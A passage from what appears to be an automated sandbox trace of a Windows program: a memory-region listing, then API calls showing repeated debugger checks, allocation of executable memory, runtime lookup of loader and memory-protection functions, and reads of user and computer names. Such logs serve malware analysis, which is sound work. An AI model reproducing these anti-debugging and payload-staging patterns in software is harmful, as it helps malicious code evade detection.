start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 914 start_va = 0x2f0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 915 start_va = 0x773f0000 end_va = 0x773f4fff entry_point = 0x773f1438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\System32\\psapi.dll" (normalized: "c:\\windows\\system32\\psapi.dll") Region: id = 916 start_va = 0x420000 end_va = 0x4e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 917 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 918 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 919 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 920 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 921 start_va = 0x570000 end_va = 0x670fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 922 start_va = 0x680000 end_va = 0x127ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000680000" filename = "" Region: id = 923 start_va = 0x13e0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013e0000" filename = "" Region: id = 924 start_va = 0x1c0000 end_va = 0x1d1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 925 start_va = 0x1e0000 end_va = 0x1ecfff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 926 start_va = 0x71a10000 end_va = 0x71a67fff entry_point = 0x71a113b4 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 927 start_va = 0x719c0000 end_va = 0x71a0efff entry_point = 0x719c1452 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 928 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 929 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 930 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 931 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 932 start_va = 0x755b0000 end_va = 0x756ccfff entry_point = 0x755b158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 933 start_va = 0x75460000 end_va = 0x7546bfff entry_point = 0x7546238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 934 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 935 start_va = 0x13f0000 end_va = 0x16befff entry_point = 0x13f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 936 start_va = 0x3b0000 end_va = 0x3bcfff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Thread: id = 34 os_tid = 0xafc [0054.574] IsDebuggerPresent () returned 0 [0054.574] AreFileApisANSI () returned 1 [0054.574] SetFileApisToANSI () [0054.574] SetFileApisToOEM () [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.574] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.575] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.576] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.577] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] GetLastError () returned 0x0 [0054.578] MsiViewFetch (hView=0xb, phRecord=0x0) returned 0x57 [0054.579] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0054.580] GetProcAddress (hModule=0x76890000, lpProcName="GetMessagePos") returned 0x768c6703 [0054.580] GetMessagePos () returned 0x0 [0054.580] JetBeginExternalBackup () returned 0xfffffc15 [0054.581] GetWindowsDirectoryA (in: lpBuffer=0x12fe48, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0054.581] lstrcatA (in: lpString1="C:\\Windows", lpString2="\\system32\\taskmgr.exe" | out: lpString1="C:\\Windows\\system32\\taskmgr.exe") returned="C:\\Windows\\system32\\taskmgr.exe" [0054.581] GetBinaryTypeA (in: lpApplicationName="C:\\Windows\\system32\\taskmgr.exe", lpBinaryType=0x12fe38 | out: lpBinaryType=0x12fe38) returned 1 [0054.581] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0054.581] GetCaretBlinkTime () returned 0x212 [0054.581] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbc4 | out: ProcedureAddress=0x12fbc4*=0x765e2fb6) returned 0x0 [0054.582] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0054.584] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fbe4 | out: ProcedureAddress=0x12fbe4*=0x765e2fb6) returned 0x0 [0054.584] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x1e0000 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e395c) returned 0x0 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e33d3) returned 0x0 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765e2fb6) returned 0x0 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765d2341) returned 0x0 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x765ddb13) returned 0x0 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x772af774) returned 0x0 [0054.585] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x12fc28 | out: ProcedureAddress=0x12fc28*=0x7731ad2e) returned 0x0 [0054.585] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0054.586] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0054.586] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="VirtualAlloc") returned 0x765e2fb6 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="IsDebuggerPresent") returned 0x765d3ea8 [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="GetCommandLineA") returned 0x765e98ff [0054.586] GetProcAddress (hModule=0x76590000, lpProcName="LoadLibraryA") returned 0x765e395c [0054.586] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0054.586] GetProcAddress (hModule=0x772a0000, lpProcName="cos") returned 0x772e7400 [0054.586] GetProcAddress (hModule=0x772a0000, lpProcName="sin") returned 0x772d41c0 [0054.586] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0054.586] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0054.587] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0054.587] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.587] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.588] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.589] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.590] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.591] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] IsDebuggerPresent () returned 0 [0054.592] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] IsDebuggerPresent () returned 0 [0054.593] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.593] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] IsDebuggerPresent () returned 0 [0054.594] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.594] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] IsDebuggerPresent () returned 0 [0054.595] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.595] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] IsDebuggerPresent () returned 0 [0054.596] 